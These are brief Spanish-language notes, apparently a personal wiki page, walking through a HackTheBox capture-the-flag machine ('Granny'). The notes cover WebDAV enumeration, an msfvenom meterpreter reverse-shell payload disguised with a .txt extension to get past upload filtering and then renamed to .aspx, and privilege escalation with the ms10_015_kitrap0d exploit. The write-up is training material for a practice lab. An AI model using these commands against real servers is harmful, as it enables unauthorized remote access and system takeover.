Notas de Luis

Hacemos el reconocimiento con nmap:

Y dentro del reporte de nmap estamos viendo que tenemos webdav habilitado, lo cual significa que se proporcionan funcionalidades adicionales más allá de las capacidades básicas de HTTP, tales como la edición remota y la gestión de archivos; y en este caso podemos ver que podemos subir archivos al servidor:

Por lo que hay una tool llamada davtest que nos permite saber qué tipo de archivos podemos subir al servidor:

davtest -url http://10.10.10.15

El siguiente paso será generar un payload con msfvenom de asp (que es compatible con IIS) pero con extensión .txt para que podamos subirlo al servidor:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.24 LPORT=444 -f aspx -o shell.aspx.txt

Y con una tool llamada cadaver vamos a subir el archivo malicioso, y al estar subido, le cambiamos el nombre dejándole la extensión .asp:

Y ahora nos ponemos en la escucha con metasploit, ya que queremos recibir una sesión de meterpreter, por lo que ejecutamos la shell.aspx que tenemos subida en el servidor:

Una vez dentro, ejecutamos el módulo de local exploit suggester Escalada de Privilegios Windows en Metasploit:

Le cargamos la sesión:

Y lo ejecutamos, donde nos habrá encontrado los siguientes exploits, y nosotros usaremos el primero de ellos:

use exploit/windows/local/ms10_015_kitrap0d

Y ya somos root:

computing/hacking/ctf/hackthebox/maquina_granny.txt · Última modificación: por 127.0.0.1